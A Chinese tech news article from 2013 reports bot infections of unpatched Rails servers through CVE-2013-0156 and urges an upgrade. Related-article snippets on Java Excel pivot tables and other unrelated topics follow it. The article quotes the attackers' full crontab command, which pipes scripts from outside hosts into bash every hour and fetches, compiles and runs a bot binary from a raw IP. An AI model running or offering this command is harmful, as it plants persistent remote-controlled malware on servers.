阅读更多

1顶
0踩

编程语言

原创新闻 Rails 老漏洞仍在肆虐,请尽快升级

2013-05-30 12:46 by 副主编 wangguo 评论(4) 有10414人浏览
安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。

攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。

该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。

攻击者试图在crontab中添加如下命令(现在该命令已不可用):

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k


该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。

Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里

目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。

Via jarmoc
1
0
评论 共 4 条 请登录后发表评论
4 楼 wujingtianze 2013-06-05 09:43
redis?
3 楼 it90ceo 2013-06-02 09:36
支持下。。。
2 楼 lection.yu 2013-05-31 10:53
黑客高人真多。。
1 楼 7y4z2008 2013-05-31 08:43
地下0day市场更多

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

  • java数据透视表_使用java如何操作excel数据透视表

    支持楼上,jxl可以。... int getNumberOfSheets()获得工作薄(Workbook)中工作表(Sheet)的个数,示例:jxl.Workbook rwb = jxl.Workbook.getWorkbook(new File(sourcefile));int sheets = rwb.getNumberOfSheets...

  • java数据透视表_Java 创建 Excel 数据透视表

    Excel 数据透视表具有强大的...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。Jar文件导入方法方法一:下载最新的 Free Spire. XLS for Java 包并解压缩 , 然后从lib文件夹下, 将 Spir...

  • java excel 透视_在Java中用Excel创建数据透视表和数据透视图

    当您需要快速分析Excel工作表中的数据并查看数据中的比较,...在本文中,我将介绍如何使用Free Spire.XLS for Java API在Java中的Excel文件中创建数据透视表和数据透视图。添加依赖项首先,您需要添加所需的依赖项,...

  • java 数据透视表 组件_Java创建Excel数据透视表

    正版现货excel效率手册早做完不锡22.82元包邮(需用券)去购买 >Excel 数据透视表具有强大的数据...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。使用工具: Free Spire. XLS for Java (...

  • java excel 透视_Java Excel透视表相关操作实现代码

    概述透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。所需工具:Free Spire.XLS for Java免费版,编辑代码前,先下载导入jar到Java程序(可手动下载导入,或通过Maven...

  • 如何使用Java以编程方式在Excel中创建数据透视表?

    Excel电子表格中的数据透视表用于以交互方式汇总数据。假设在工作表中有许多发票...为了使用Excel数据透视表,我们将使用Aspose.Cells for Java,它是一个功能强大的API,可让您从Java应用程序内部生成,修改和转换Exc

  • java数据透视表算法_用Java Steams创建数据透视表

    【51CTO.com快译】这次让我们来看看如何使用Java 8 Streams(流)来实现一张数据透视表。通常情况下,原始数据本身一般并不容易被人们所读懂,因此我们需要进行一些数据聚合操作来辨别出原始数据中的各种规律模式。而...

  • java excel 透视_java基于poi导出excel透视表代码实例

    这篇文章主要介绍了java基于poi导出excel透视表代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下从前,我是一个前端程序猿,怀着对打通任(前)督(后)二...

  • java excel 透视_JAVA操作Excel创建透视表

    Free Spire.XLS for Java,作者使用的是免费版。可去官网下载Jar包后解压,将解压后lib文件夹下的Spire.Xls.jar手动导入到Java程序;或者通过Maven仓库下载导入。JAVA程序代码如下importcom.sp...

  • java poi 数据透视,Apache的POI:Excel数据透视表 - 行标签

    I have a requirement to create a excel sheet in JAVA as below :I am not able to create a row label with multiple columns side by side ( menus and submenus filter ).Instead of displaying the submenu in...

  • 手把手教你如何在Java在Excel中进行数据分析

    前一段时间淘宝出了一个“淘宝人生”的模块,可以看从注册淘宝账号至今的消费记录,仔细想了想,现在微信、淘宝这些APP好像都喜欢出这种记录使用者的支付、消费情况的功能。

  • excel 宏 数据透视表_宏从多个文件创建Excel数据透视表

    excel 宏 数据透视表 宏从多个文件创建Excel数据透视表 (Macro Creates Excel Pivot Table From Multiple Files) If you want to create a pivot table from data on different worksheets, you can use a Multiple ...

  • excel数据透视表_Excel数据透视表排序问题

    excel数据透视表 Excel数据透视表排序问题 (Excel Pivot Table Sorting Problems) Usually, it's easy to sort an Excel pivot table – just click the drop down arrow in a pivot table heading, and select one ...

  • excel数据透视表_Excel数据透视表选择快速提示

    excel数据透视表 Excel数据透视表选择快速提示 (Excel Pivot Table Selection Quick Tip)To format a pivot table, you can select a specific section, such as one of the fields, or a grand total. When you ...

  • java excel 透视,Java开源库生成数据透视表excel

    Given an excel file I want to generate a pivot table programmatically. I have heard of Aspose.Cells but it is paid version. Can someone suggest some open source libraries similar to Aspose.Cells or at...

  • java刷新透视表数据源,Java 创建、刷新Excel透视表/设置透视表行折叠、展开

    Java 创建、刷新Excel透视表/设置透视表行折叠、展开透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。本文以创建透视表、刷新透视表以及设置透视表的行展开或折叠为例,...

  • spring-boot-2.6.6.jar中文-英文对照文档.zip

    # 压缩文件中包含: 中文-英文对照文档 jar包下载地址 Maven依赖 Gradle依赖 源代码下载地址 # 本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;

  • LabVIEW中最小二乘法曲线拟合与报表生成:流程图自动化实现波形拟合的最佳方法

    内容概要:本文详细介绍了LabVIEW中最小二乘法的应用及其在曲线拟合和报表生成中的具体实现。LabVIEW作为一种流程图编程语言和开发环境,能够通过图形化编程的方式,使用户轻松构建拟合模型并计算最佳拟合曲线的参数。此外,LabVIEW还提供了丰富的波形处理和分析工具,支持对波形数据进行预处理(如滤波、降噪和采样),并通过最小二乘法进行波形拟合,最终生成详细的报表。最小二乘法通过最小化数据点与拟合曲线之间的误差平方和,广泛应用于统计学、工程学和物理学等领域。 适合人群:从事科学研究、工程设计和数据分析的专业人士,尤其是那些希望通过图形化编程提高工作效率的人群。 使用场景及目标:适用于需要对大量数据进行拟合分析并生成报告的场合,如实验数据分析、工程设计验证等。目标是通过LabVIEW提供的强大工具,快速准确地找到最佳拟合曲线,提升数据分析效率。 其他说明:LabVIEW不仅简化了编程过程,还提高了数据分析的直观性和准确性,使得即使是非专业程序员也能轻松上手。

  • C语言编程入门教程精简版专题培训课件.ppt

    C语言编程入门教程精简版专题培训课件.ppt

  • spring-boot-2.4.4.jar中文文档.zip

    # 压缩文件中包含: 中文文档 jar包下载地址 Maven依赖 Gradle依赖 源代码下载地址 # 本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 # 特殊说明: ·本文档为人性化翻译,精心制作,请放心使用。 ·只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; ·不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 # 温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件;

Global site tag (gtag.js) - Google Analytics